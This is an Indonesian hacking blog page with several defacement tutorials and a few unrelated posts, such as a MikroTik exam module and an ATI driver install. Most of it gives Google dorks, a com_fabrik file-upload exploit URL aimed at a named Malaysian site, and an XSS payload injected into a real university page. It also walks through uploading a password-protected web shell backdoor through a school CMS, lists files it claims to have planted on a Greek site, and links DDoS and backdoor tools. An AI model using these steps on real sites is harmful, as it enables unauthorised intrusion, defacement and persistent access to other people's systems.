BREAKING NEWS

Konfigurasi MikroTik UKK 2017 | TKJ

Konfigurasi MikroTik UKK 2016 TKJ

Assalamu'alaikum Warahmatulloh, selamat malam para Peselancar Internet dan para Maniak WiFi semoga tetap dalam jalan yang benar, kali ini saya akan memberikan satu Modul Konfigurasi MikroTik untuk masalah UKK dalam jurusan jaringan atau TKJ semoga bermanfaat.

Konfigurasi MikroTik UKK 2016 SMK Yasmida Ambarawa
Konfigurasi MikroTik UKK 2017 TKJ


UKK adalah singkatan dari kata Ujian Kompetensi Kejuruan.  Istilah Ujian Kompetensi Kejuruan apabila disingkat yaitu menjadi UKK. Akronim  UKK (Ujian Kompetensi Kejuruan) merupakan singkatan/akronim tidak resmi dalam Bahasa Indonesia.


Download Modul UKK MikroTik Terbaru


Pembahasan UKK MikroTik Paket 2 | Tp. 2016-2017



Pembahasan UKK MikroTik Paket 3 | Tp. 2016-2017



Terimakasih sudah berkunjung di blog sederhana ini, semoga bermanfaat, Ameen ?

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Deface Metode PDW File Browser Arbitrary | File Upload Vulnerability

Cara Deface Metode PDW File Browser Arbitrary | File Upload Vulnerability


Selamat malam sobat tercinta, ketemu lagi dengan saya anak paling maco seLampung, kali ini gw mau post teknik deface PDW File Browser, ini adalah File Upload Vulnerability hanya memanfaatkan bug website yang tidak di path dengan baik sehingga file upload dapat di akses.


Dork

inurl:"pdw_file_browser"
silahkan kembangkan sesuai dengan kecerdasan otak mesum kalian :v.

Download Tutor Lengkap : [ Linknya dibawah postingan ! ]


Baca Juga.





Langkah Deface Metode PDW File Browser


1. Copy dork dan paste di google lalu pilih salah satu Target, berdoalah semoga dapet yang vuln dan verawan :D
Jika mendapat yang vuln akan melihat tampilan seperti ini, lalu klik Upload seperti tanda panah dibawah ini.

Cara Deface Metode PDW File Browser Arbitrary
Cara Deface Metode PDW File Browser Arbitrary


2. Setelah klik upload, pilih akan muncul tampilan seperti ini, lalu klik Browse, lalu akan otomatis upload, setelah upload complete setelah itu klik Cancel.

Cara Deface Metode PDW File Browser Arbitrary
Cara Deface Metode PDW File Browser Arbitrary


3. Kemudian carilah file yang ente upload tadi, disini saya upload file gambar bernama [ def.png ], klik file tersebut, dan lihat tanda panah nomor 2 akan muncul linknya, copy link tersebut dan paste di new tab.

Cara Deface Metode PDW File Browser Arbitrary
Cara Deface Metode PDW File Browser Arbitrary


4. Jika berhasil maka akan tampil seperti dibawah ini :D

Cara Deface Metode PDW File Browser Arbitrary
Cara Deface Metode PDW File Browser Arbitrary

Targetku

http://www.archontiko1787.gr/images/news/def.png
http://www.archontiko1787.gr/images/news/mw.txt
http://www.archontiko1787.gr/images/news/Pringsewu.png

Download
Modul PDW File Browser Arbitrary | Visit

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Deface Website Malaysia si Lucknut !

Cara Deface Website Malaysia si Lucknut !


Assalamu'alaikum WR WB selamat pagi para pecinta pinguin yang tercinta :D, dipagi ini dapet berita yang menjengkelkan dimana bendera Negara Kesatuan Republik Indonesia dilecehkan di ajang Internasional, tentu kita sebagai warga Negara yang baik tidak akan tinggal diam dong, mari kita balas dengan prestasi untuk yang ikut Ajang tersebut, sedangkan kita yang disini harus berbuat sesuatu :D

Cara Deface Website Malaysia si Lucknut !
Cara Deface Website Malaysia si Lucknut !
Berikut Macam Tekhnik yang sangat Mudah :D

Deface Metode Com_Fabrik



Dork Com_Fabrik

inurl:index.php?option=com_fabrik site:my
inurl:viewTable?cid= site:my

Exploit

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Contoh

Wesite Target
http://e-jobs.felda.net.my/

Tambahkan Exploit menjadi
http://e-jobs.felda.net.my/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Baca Juga.





Vuln

Jika vuln akan muncul form Upload CRV
upload file anda, contoh saya upload format [ .jpg ]

Hasil

Untuk melihatnya tambahkan /media/ dibelakan domain
http://e-jobs.felda.net.my/media/
kemudian ketik nama file yang anda upload sehingga menjadi
http://e-jobs.felda.net.my/media/sial.jpg

Oke semoga bermanfaat Dunia dan Akherat :D

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Scan Celah XSS dengan XssPy Scanner

Cara Scan Celah XSS dengan XssPy Scanner


Selamat pagi kembali lagi posting-posting artikel yg gx bermanfaat ini, kali ini kita share tentang xss untuk pengguna pinguin, dengan menggunakan tools XssPy dibuat dengan menggunakan bahasa python.

XssPy adalah tools yang digunakan untuk mengecek vuln website yang memiliki vuln di XSS Include, agar lebih mudah kita dalam menemukan celahnya.

Langkah-langkah Scan Celah XSS

1. Download Terlebih dari dahulu XssPy di bawah ini, dengan menggunakan Terminal di linux.
git clone https://github.com/faizann24/XssPy.git

Cara Scan Celah XSS dengan XssPy Scanner
Cara Scan Celah XSS dengan XssPy Scanner


2. Kemudian ketik 
ls
untuk melihat folder XssPy yg sudah di download.

Cara Scan Celah XSS dengan XssPy Scanner
Cara Scan Celah XSS dengan XssPy Scanner


3. masuk ke folder XssPy dengan cara
cd XssPy/

Cara Scan Celah XSS dengan XssPy Scanner
Cara Scan Celah XSS dengan XssPy Scanner

4. Lalu 
sudo pip install mechanize
jika seperti ini berarti sudah di install
Requirement already satisfied: mechanize in /usr/lib/python2.7/dist-packages

Cara Scan Celah XSS dengan XssPy Scanner
Cara Scan Celah XSS dengan XssPy Scanner


5. untuk mulai scan seperti ini.
python XssPy.py -u pringsewukab.go.id
jangan menggunakan http:// ataupun www, biarkan system yang bekerja :p

Cara Scan Celah XSS dengan XssPy Scanner
Cara Scan Celah XSS dengan XssPy Scanner


6. Lalu system akan scan otomatis web target tersebut.

Cara Scan Celah XSS dengan XssPy Scanner
Cara Scan Celah XSS dengan XssPy Scanner


Ok semoga bermanfaat :v

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Menggunakan Cross Site Script Include di Kali Linux

Cara Menggunakan Cross Site Script Include di Kali Linux

XSS adalah teknik hacking dengan jenis serangan Injeksi Kode ( Code Injection Attack ). kepanjangan dari XSS adalah Cross Site Scripting. Kok gak CSS ya? entah yang namain jadi XSS lagi ngantuk apa gimana tapi dari yang ane baca baca, dinamakan XSS itu karna nama CSS sudah di pakai untuk Cascade Style Sheet. Cara kerjanya cukup mudah Attacker hanya tinggal memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client. teknik ini cukup berbahaya karna bisa mencuri Cookie komputer seseorang.

Cara Menggunakan Cross Site Script Include di Kali Linux
Cara Menggunakan Cross Site Script Include di Kali Linux


Dork 

inurl:/search_results.php?search=

Langkah - Langkah

1. Copy dork dan paste ke browser, dan pilih salah satu target.

Cara Menggunakan Cross Site Script Include di Kali Linux
Cara Menggunakan Cross Site Script Include di Kali Linux


2. Lihat linknyakn seperti dibawah ini.
http://voices.iit.edu/search_results.php?filter_by=broadcast_lang&filter_value=English
kemudian kita hapus menjadi seperti ini.
http://voices.iit.edu/search_results.php?filter_by=

Cara Menggunakan Cross Site Script Include di Kali Linux
Cara Menggunakan Cross Site Script Include di Kali Linux


3. Setelah itu kita tambahkan script seprti dibawah ini.
<script>alert("H4ck3d by ./Maniak_WiFi");</script>
sehingga menjadi
http://voices.iit.edu/search_results.php?filter_by=<script>alert("H4ck3d by ./Maniak_WiFi");</script>
dan lihatlah seperti dibawah ini :v

Cara Menggunakan Cross Site Script Include di Kali Linux
Cara Menggunakan Cross Site Script Include di Kali Linux
Ok Semoga Bermanfaat dunia dan akherat :v

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Install ATI Driver di Kali Linux Terbaru

Cara Install ATI Driver di Kali Linux


Cara Install ATI Driver di Kali Linux
Cara Install ATI Driver di Kali Linux
Install ATI Driver adalah salah atu driver untuk linux untuk membenahi Graphic dan materi ini saya dapat dari forum IBT Team - VISIT dan saya hanya copas saja, karena menurut saya ini penting untuk bagi, dan sebagai dokumen saja, agar jika saya butuh bisa buka artikel ini.

Langkah Install ATI Driver

Ikuti terus langkah-langkah install driver ATI di Kali Linux ini, jika ada yang ingin ditanyakan silahkan kunjungi Forum Resminya saja.

1.  Ketik / copy perintah berikut ini.
apt-get remove --purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* xorg-driver-fglrx

2. Kita rubah dulu Source Listnya.
leafpad /etc/apt/sources.list

Untuk Kali Linux 32Bit
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL Binary 20130425-11:12]/ kali contrib main non-free 
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL Binary 20130425-11:12]/ kali contrib main non-free
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib 
## Security updates
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
Untuk Kali Linux 64 Bit
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL Binary 20130315-11:02]/ kali contrib main non-free 
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL Binary 20130315-11:02]/ kali contrib main non-free
deb http://http.kali.org/kali kali main non-free contrib
deb-src http://http.kali.org/kali kali main non-free contrib 
## Security updates
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Oke jika sourcelist sudah dirubah sesuai dengan diatas, maka kita siap lanjut ke langkah selanjutnya.

3. Kita update dulu
apt-get update

4. Install Linux Header terlebih dahulu
apt-get install linux-headers-$(uname -r|sed 's,[^-]*-[^-]*-,,')

Kemudian lanjutkan dengan menginstall drivernya
apt-get install fglrx-driver fglrx-control fglrx-glx fglrx-atieventsd fglrx-modules-dkms

Setelah menginstall driver maka akan ada error seperti ini :
Error! Bad return status for module build on kernel: 3.7-trunk-amd64 (x86_64)
Consult /var/lib/dkms/fglrx/12-6+point/build/make.log for more information.

Selanjutnya akan dibahas untuk cara mengatasi dari error tersebut :

a. Download fglrx-3.7.patch di sini https://docs.google.com/file/d/0B4VfWnVn...edit?pli=1

b. Copy fglrx-3.7.patch ke /root

c. Copy file fglrx-modules-dkms ke /root dan kemudian lakukan patching pada driver yang tadinya error

Untuk versi 32 bit caranya adalah : 
cp /var/cache/apt/archives/fglrx-modules-dkms_1%3a12-6+point-3_i386.deb /root
mkdir /extract/DEBIAN
dpkg-deb -x fglrx-modules-dkms_1%3a12-6+point-3_i386.deb extract/
dpkg-deb -e fglrx-modules-dkms_1%3a12-6+point-3_i386.deb extract/DEBIAN
cp fglrx-3.7.patch extract/usr/src/fglrx-12-6+point/
cd extract/usr/src/fglrx-12-6+point/
patch -p0 < fglrx-3.7.patch

Jika patching berhasil,hasilnya akan seperti di bawah ini :
patching file firegl_public.c
Hunk #1 succeeded at 3890 (offset -2 lines).
Hunk #2 succeeded at 3920 (offset -2 lines).
Hunk #3 succeeded at 3935 (offset -2 lines).
Hunk #4 succeeded at 3944 (offset -2 lines).
Hunk #5 succeeded at 3982 (offset -2 lines).
Hunk #6 succeeded at 4013 (offset -2 lines).
Hunk #7 succeeded at 4023 (offset -2 lines).
Hunk #8 succeeded at 4044 (offset -2 lines).

cd /root
mkdir build
dpkg-deb -b extract/ build/
cd build
dpkg -i *.deb

Untuk versi 64 bit caranya sama seperti di atas, hanya tinggal mengganti i386 ke amd 64, misalnya : 
fglrx-modules-dkms_1%3a12-6+point-3_i386.deb menjadi fglrx-modules-dkms_1%3a12-6+point-3_amd64.deb 

Patching telah berhasil dilakukan.

Eittsss belum selesai, masih ada beberapa langkah lagi yang harus dilakukan.

Ketikkan di terminal : 

aticonfig --initial -f

Selanjutnya ini yang terpenting. Driver ATI akan di aktifkan pada saat startup.

leafpad /boot/grub/grub.cfg

Jika anda melihat script ini : 

### BEGIN /etc/grub.d/10_linux ###
menuentry 'Debian GNU/Linux, with Linux 3.7-trunk-686-pae' --class debian --class gnu-linux --class gnu --class os {
    load_video
    insmod gzio
    insmod part_msdos
    insmod ext2
    set root='(hd0,msdos6)'
    search --no-floppy --fs-uuid --set=root 854eeb75-c7e0-4cc0-b847-4bf6d0c57e42
    echo    'Loading Linux 3.7-trunk-686-pae ...'
    linux    /boot/vmlinuz-3.7-trunk-686-pae root=UUID=854eeb75-c7e0-4cc0-b847-4bf6d0c57e42 ro initrd=/install/gtk/initrd.gz quiet
    echo    'Loading initial ramdisk ...'
    initrd    /boot/initrd.img-3.7-trunk-686-pae
}

Maka tambahkan radeon.modeset=0 setelah line linux /boot/vmlinuz-3.7-trunk-686-pae root=UUID=854eeb75-c7e0-4cc0-b847-4bf6d0c57e42 ro initrd=/install/gtk/initrd.gz quiet 

Jadinya seperti ini : 

### BEGIN /etc/grub.d/10_linux ###
menuentry 'Debian GNU/Linux, with Linux 3.7-trunk-686-pae' --class debian --class gnu-linux --class gnu --class os {
load_video
insmod gzio
insmod part_msdos
insmod ext2
set root='(hd0,msdos6)'
search --no-floppy --fs-uuid --set=root 854eeb75-c7e0-4cc0-b847-4bf6d0c57e42
echo 'Loading Linux 3.7-trunk-686-pae ...'
linux /boot/vmlinuz-3.7-trunk-686-pae root=UUID=854eeb75-c7e0-4cc0-b847-4bf6d0c57e42 ro initrd=/install/gtk/initrd.gz quiet radeon.modeset=0
echo 'Loading initial ramdisk ...'
initrd /boot/initrd.img-3.7-trunk-686-pae
}

Save dan kemudian tutup grub.cfg

Reboot komputer anda. Dan Driver ATI akan di load pada saat startup, driver ATI berhasil diinstall dan dapat berjalan dengan baik.

Tambahan : 

Untuk mengaktifkan power saver atau laptop mode, ketikkan di terminal :

echo 5 > /proc/sys/vm/laptop_mode

Untuk mengembalikan ke seperti semula ketikkan :

echo 0 > /proc/sys/vm/laptop_mode

Semoga membantu dan semoga bermanfaat :-bd


Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Download Kumpulan Tools Hacking Terbaru Work 100%

Download Kumpulan Tools Hacking Terbaru Work 100%


Download Kumpulan Tools Hacking Terbaru Tahun ini, buruan download mumpung masih Work dan link masih hidup, siapa cepat dia dapat :D

Download Kumpulan Tools Hacking Terbaru Work 100%
Download Kumpulan Tools Hacking Terbaru Work 100%


100+ Free Tools Hacking [ VISIT ]

Tools Hacking


DDoS Attack

Havij

Grenox

Nmap

Nmap (Network Mapper) adalah utilitas open source gratis untuk eksplorasi dan analisis keamanan sebuah jaringan. Sebagian orang mungkin tidak asing lagi mendengar nama besar Nmap. Hack tools yang satu ini sudah cukup lama mondar-mandir di dunia bawah tanah (red: hacking). Nmap didesain mengetahui port-port yang terbuka atau tidak terfilter dengan baik. Bahkan, para administrator jaringan menggunakan untuk mengetahui kemananan jaringannya sendiri. Nmap akan memetakan berbagai informasi penting dalam jaringan, antara lain informasi host, service, sistem operasi, tipe paket yang dikirim, firewall, dan lainnya.

[ DOWNLOAD ]

Nessus Remote Security Scanner

Nessus Remote Security Scanner adalah software yang sangat populer dan banyak digunakan oleh organisasi keamanan jaringan dunia. Sekarang ini Nessus telah digunakan lebih dari 75.000 organisasi dunia. Hack tools ini digunakan untuk mengetahui celah keamanan sebuah jaringan. Memang, Nessus bukanlah sebuah program open source lagi, namun namun Nessus masih bebas digunakan secara gratis.

[ DOWNLOAD ]

John the Ripper

John the Ripper adalah hack tools yang cukup terkenal yang biasa digunakan untuk meng-crack suatu password dengan cepat dan tersedia pada banyak platfom, antara lain UNIX, Windows, DOS, BeOS, dan OpenVMS. Tujuan utama dari John The Ripper adalah untuk mendeteksi kelemahan password pada sistem UNIX (termasuk Linux). John The Ripper merupakan program yang dapat membantu administrator menentukan kelayakan suatu password. Namun John The Ripper juga digunakan oleh pihak-pihak yang tidak berkepentingan untuk mendapatkan password seorang user.

[ DOWNLOAD ]

Nikto

Nikto adalah hack tools untuk pemeriksaan vulnerability pada Apache. Jadi kamu dapat mengetahui di mana letak hole pada suatu web server. Proses scanning sangat dibutuhkan untuk menganalisa apakah web server yang kamu buat itu sudah tidak ada kekurangan atau malah masih banyak kekurangan.

[ DOWNLOAD ]

Acunetix – Web Vulnerability Scanner

Acunetix – Web Vulnerability Scanner adalah software untuk mendeteksi suatu celah kerentanan situs yang banyak dipakai oleh pakar security dan developer web untuk memeriksa keamanan dari website yang mereka bangun. Kamu dapat melakukan Scan Engine yang dapat mendeteksi celah kerentanan atau vulnerability. Kamu cukup memasukkan alamat website yang akan di-scan, kemudian Acunetix akan secara otomatis memeriksa situs kamu.

[ DOWNLOAD ]

P0f

P0f adalah suatu alat yang memanfaatkan array canggih, yang bisa melakukan pengambilan sidik jari secara pasif. P0f merupakan alat sistem operasi fingerprinting yang cukup unik, karena tidak mengirim paket ke target, melainkan hanya mengambil paket dan memeriksa mereka untuk menentukan sistem operasi yang mengirim mereka.

[ DOWNLOAD ]

Wireshark

Wireshark adalah penganalisis paket gratis dan open source. Perangkat ini digunakan untuk pemecahan masalah jaringan, analisis, perangkat lunak dan pengembangan protokol komunikasi, dan pendidikan. Awalnya bernama Ethereal, pada Mei 2006 proyek ini berganti nama menjadi Wireshark karena masalah merek dagang.

[ DOWNLOAD ]

Metasploit

Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem. Metasploit dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka atau untuk masuk ke sistem remote. Seperti alat-alat keamanan banyak informasi, Metasploit dapat digunakan untuk kegiatan baik yang sah dan tidak sah.

[ DOWNLOAD ]

Eraser

Eraser merupakan alat keamanan yang canggih untuk Windows, yang memungkinkan kamu untuk sepenuhnya menghapus data sensitif dari harddrive. Hack tools ini bekerja dengan Windows 95, 98, ME, NT, 2000, XP dan DOS. Eraser ini memastikan, bahwa data yang kamu hapus, benar-benar terhapus.

[ DOWNLOAD ]

Social Engineer Toolkit

Fungsi utama Social Engineer Toolkit adalah untuk mendapatkan informasi, mendapatkan izin akses, dan banyak hal yang lainnya juga. Social Engineer Toolkit berisi sekumpulan hack tools yang difokuskan untuk melakukan serangan terhadap kelemahan user/manusia di dalam Pen-Test. Tujuan utama dari Social Engineer Toolkit adalah mensimulasikan Social Engineer Attack sehingga dapat memungkinkan penguji suatu sistem untuk secara efektif dapat menguji bagaimana serangan dapat berjalan dengan baik.

[ DOWNLOAD ]

Script Deface



Shell Backdoor




Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Upload Script Deface dengan Shell Backdoor Andela

Cara Upload Script Deface dengan Shell Backdoor Andela

Apa itu shell ? 
Shell Backdoor adalah shell adalah program (penterjemah perintah) yang menjembatani user dengan sistem operasi dalam hal ini kernel (inti sistem operasi), umumnya shell menyediakan prompt sebagai user interface, tempat dimana user mengetikkan perintah-perintah yang diinginkan baik berupa perintah internal shell (internal command), ataupun perintah eksekusi suatu file progam (eksternal command), selain itu shell memungkinkan user menyusun sekumpulan perintah pada sebuah atau beberapa file untuk dieksekusi sebagai program.

Download Shell Backdoor [ Andela 1 C3 v.3 ]

Langkah Upload Script Deface/Tebas Index

1. Ok setelah Shell Berhasil Masuk ke Web, lalu passwordnya isikan [ haurgeulis ]



2. Ini adalah tampilan awal dari Shell Backdoor Andela.



3. Kemudian klik Public_html, dan lihat index.php website utama, jika ingin tebas, edit saja, lalu ganti dengan script deface anda, tp jangan tebas, mending nitip Script Deface Saja.



4. Oke sudah di halaman public_html, setelah itu lihat dibagian Menu ada Menu Upload, Klik saja menu Upload.



5. Oke setelah itu Klik Tombol Pilih File, dan pilih Script Deface anda, lalu klik Go.



6. Habis itu lihatlah File Script Deface anda dengan format [ .html ]



7. Setelah itu coba buka filenya dengan cara.
www.target.co.li/[namascript.html]
http://www.sman1gedongtataan.sch.id/Merdekaaa.html


Alhamdulilah file sudah berhasil, semoga bermanfaat.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Upload Shell Backdoor di CMS Schoolhos

Cara Upload Shell Backdoor di CMS Schoolhos


Selamat pagi menjelang siang masih lanjut dengan belajar dan terus belajar, belajar nakal gx papa sekali-sekali, hhh. tp jangan Tebas Index yah, Hargai yang buat Website, kita nitip Script Deface saja.

Shell Backdoor Andela
Shell Backdoor Andela


Langkah-langkah Upload Shell Backdoor


1. Buka halaman loginnya, jika belom ketemu coba cari make Admin Finder, cari aja di blog ini kynya ada deh.
Kalau di web ini make /appspanel/
contoh : www.target.co.li/appspanel/login.php

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos


2. Jika berhasil masuk ke Admin maka tampilan kurang lebihnya seperti ini.

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos


3. Klik Menu Mata Pelajaran.

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos


4. Kemudian Klik Tab Meteri Pelajaran, kemudian klik Tombol Tambah.

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos


5. Lalu Pilih Mata Pelajaran, setelah itu Klik Lanjut>.

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos


6. Lalu Isi seperti dibawah ini.
- Judul Materi : Belajar Membaca Puisi
- File Materi : Pilih File Shell Backdoor anda, saya memilih Shell Andela.
- Deskripsi : Isi terserah.
- Guru Pengampu : Pilih saja, jangan ditinggalkan.
Lalu Klik Tambah.

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos


7. Lihat data berhasil ditambahkan, setelah itu klik Edit.

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos


8. Setelah itu lihat File Materi, lihat ada file Shell Backdoor yang tadi kita pilih, nama file yang saya upload saya adalah [ merdeka.php ].
Setelah itu klik Kanan lalu Buka tautan di tab baru.

Cara Upload Shell Backdoor di CMS Schoolhos
Cara Upload Shell Backdoor di CMS Schoolhos
Itulah Cara Upload Shell Backdoor atau Upload Script Deface.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara Descrypt Hash MD5 Online Work 100%

Cara Descrypt Hash MD5 Online Work 100%


Hash Killer MD5 Adalah web online yang memungkinkan Anda untuk memasukkan hash MD5 dan mencari keadaan terdekripnya di database kami, pada dasarnya, ini adalah alat cracker / dekripsi MD5.

Berapa banyak dekripsi yang ada di database anda? 
Kami memiliki total lebih dari 829.726 miliar hash MD5 dekripsi yang unik sejak Agustus 2007.

Cara Descrypt Hash MD5 Online Work 100%
Cara Descrypt Hash MD5 Online Work 100%


Harap masukan hash MD5 yang ingin Anda ubah menjadi teks / retak / didekripsi. Perhatikan bahwa karakter spasi diganti dengan [spasi]:

Harap perhatikan kata sandinya adalah setelah : karakter, dan hash MD5 ada sebelumnya.

Link [ https://hashkiller.co.uk/md5-decrypter.aspx ]

Langkah Crack MD5


1. Masuk Chrome, ketik adjah Hash Killer dan Enter, makan muncul biasanya paling atas :D

Cara Descrypt Hash MD5 Online Work 100%
